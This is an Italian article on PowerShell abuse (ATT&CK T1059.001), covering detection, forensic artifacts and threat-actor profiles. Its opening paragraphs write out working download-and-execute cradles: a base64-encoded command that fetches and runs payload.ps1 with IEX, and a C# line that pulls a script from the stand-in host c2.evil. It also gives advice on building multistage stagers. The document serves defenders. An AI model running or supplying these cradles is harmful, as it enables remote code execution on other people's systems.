Esecuzione con PowerShell: Command and Scripting Interpreter - PowerShell (T1059.001)

L'esecuzione di payload tramite PowerShell inizia spesso con tecniche di encoding per evadere i controlli superficiali. Il comando base per scaricare ed eseguire in memoria diventa: powershell -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQB8AEkARQBYAA==

Per bypass più sofisticati, APT29 e Lazarus Group utilizzano l'esecuzione tramite .NET senza invocare powershell.exe. In C# si implementa così: System.Management.Automation.PowerShell.Create().AddScript("IEX (New-Object Net.WebClient).DownloadString('http://c2.evil/payload')").Invoke();

I framework come Empire automatizzano queste tecniche. Per testare in laboratorio, configura un listener HTTP e genera uno stager PowerShell che utilizza reflection per caricare assembly .NET in memoria. FIN7 ha perfezionato questa tecnica con POWERTRASH, una variante offuscata di PowerSploit che randomizza le variabili e splitta le stringhe per evadere signature statiche.

L'esecuzione remota richiede WinRM attivo sul target. Il comando Invoke-Command -ComputerName TARGET -ScriptBlock {Get-Process} -Credential $cred diventa letale quando combinato con credenziali compromesse. APT28 ha dimostrato l'efficacia di questa tecnica nella campagna Nearest Neighbor, concatenando compromissioni attraverso sistemi dual-homed.

Per simulare tecniche APT avanzate, implementa download cradle multistadio. Prima scarica uno script loader minimo che verifica l'ambiente, poi recupera il payload principale solo se le condizioni sono sicure. Questa tecnica, usata da Mustang Panda, riduce l'esposizione del C2 principale.

La detection efficace richiede monitoraggio multilivello che vada oltre i semplici pattern di comando. Event ID 4104 (Script Block Logging) cattura il contenuto degli script PowerShell eseguiti, ma genera volumi enormi in ambienti enterprise. Filtra prioritizzando script con lunghezza superiore a 5000 caratteri o contenenti pattern specifici come [System.Reflection.Assembly]::Load.

I parent process anomali sono indicatori critici. Excel.exe o WinWord.exe che spawnano powershell.exe indicano quasi sempre attività malevola. Configura alert per processi Office che generano PowerShell con parametri -enc, -nop, o -bypass. Emotet e TrickBot utilizzano pesantemente questa catena d'attacco.

Il monitoraggio delle connessioni di rete da processi PowerShell identifica download cradle attivi. Correla Event ID 3 di Sysmon (connessioni di rete) con Event ID 1 (creazione processo) dove l'immagine è powershell.exe. Connessioni verso IP pubblici non categorizzati o domini giovani (registrati da meno di 30 giorni) meritano investigazione immediata.

L'analisi comportamentale deve includere il caricamento di assembly .NET sospetti. Event ID 7 di Sysmon traccia i moduli caricati; cerca System.Management.Automation.ni.dll caricato da processi non standard. Questa tecnica, favorita da Cobalt Strike, permette esecuzione PowerShell senza powershell.exe.

Per ridurre i falsi positivi, implementa whitelist basate su hash per script PowerShell legittimi ricorrenti nel tuo ambiente. Mantieni baseline di normale attività PowerShell per reparto, identificando deviazioni statistiche. Script eseguiti fuori orario lavorativo o da account di servizio non autorizzati richiedono validazione immediata.

L'analisi forense di attacchi PowerShell inizia dal registro Microsoft-Windows-PowerShell/Operational. Event ID 4103 (Module Logging) e 4104 forniscono visibilità completa sui comandi eseguiti, anche quando offuscati o codificati. La chiave è correlare questi eventi con la timeline generale dell'incidente per ricostruire la catena d'attacco.

Gli artefatti di prefetch (C:\Windows\Prefetch\POWERSHELL.EXE-*.pf) rivelano quando PowerShell è stato eseguito e quali DLL sono state caricate. Analizza i file .pf con strumenti come PECmd per identificare esecuzioni anomale, specialmente quelle che caricano moduli da directory temporanee o percorsi utente.

La memoria volatile contiene tracce critiche di script eseguiti in-memory. Process dump di powershell.exe o wsmprovhost.exe (per sessioni remote) spesso contengono script decodificati e variabili con credenziali o target. APT29 nella campagna SolarWinds ha lasciato tracce di script PowerShell nella memoria dei processi anche ore dopo l'esecuzione.

Il registro di Windows mantiene persistenza di molti attacchi PowerShell. Le chiavi HKCU\Software\Microsoft\Windows\CurrentVersion\Run spesso contengono comandi PowerShell codificati per mantenere persistenza. Gamaredon Group utilizza pesantemente questa tecnica, nascondendo script PowerShell offuscati in valori di registro apparentemente innocui.

Per ricostruire lateral movement, analizza i log di Windows Remote Management (WinRM) in Applications and Services Logs\Microsoft\Windows\WinRM. Cerca pattern di connessioni da IP interni inusuali o autenticazioni con account di servizio. La correlazione con Event ID 4624 (logon riuscito) di tipo 3 (rete) identifica movimenti laterali via PowerShell remoting.

APT29 (Cozy Bear) rappresenta l'eccellenza nell'uso sofisticato di PowerShell. Durante SolarWinds Compromise, hanno dimostrato capacità di utilizzare PowerShell per task complessi mantenendo footprint minimo. I loro script utilizzano heavy obfuscation con multiple layer di encoding, spesso Base64 dentro Base64, e leverano WMI per execution indiretta. Geograficamente focalizzati su target governativi e Fortune 500 in Nord America ed Europa.

Lazarus Group adotta un approccio più aggressivo, utilizzando PowerShell per deployment rapido di ransomware e cryptocurrency miner. Operation Dream Job ha mostrato l'uso di PowerShell per reconnaissance estensiva prima del deployment del payload principale. I loro script sono caratterizzati da funzioni anti-sandbox che verificano CPU cores, RAM disponibile e presenza di strumenti di analisi.

FIN7 si distingue per l'uso criminale altamente professionalizzato. POWERTRASH, la loro variante custom di PowerSploit, dimostra investimento significativo in R&D per evasion. Targeting principale: retail e hospitality per furto dati carte di credito. I loro PowerShell stager sono distribuiti via macro Word altamente offuscate con social engineering specifico per CFO e controller finanziari.

APT28 (Fancy Bear) nella Nearest Neighbor Campaign ha innovato sfruttando reti Wi-Fi adiacenti e sistemi dual-homed. Il loro uso di PowerShell si focalizza su credential harvesting con Invoke-Mimikatz customizzato. Pattern geografico: organizzazioni con expertise su Europa dell'Est, think tank politici, contractor della difesa.

MuddyWater (Iran) mostra preferenza per PowerShell Empire con modifiche custom per bypass di prodotti EDR specifici del Medio Oriente. I loro attacchi seguono pattern temporali correlati con tensioni geopolitiche regionali, intensificandosi durante negoziati internazionali o sanzioni.

Framework MITRE ATT&CK T1059.001. Campagne documentate: SolarWinds Compromise (C0024), Operation Dream Job (C0022), HomeLand Justice (C0038), APT28 Nearest Neighbor (C0051). Risorse detection: Sigma rules per PowerShell abuse, Splunk Threat Research PowerShell detection queries.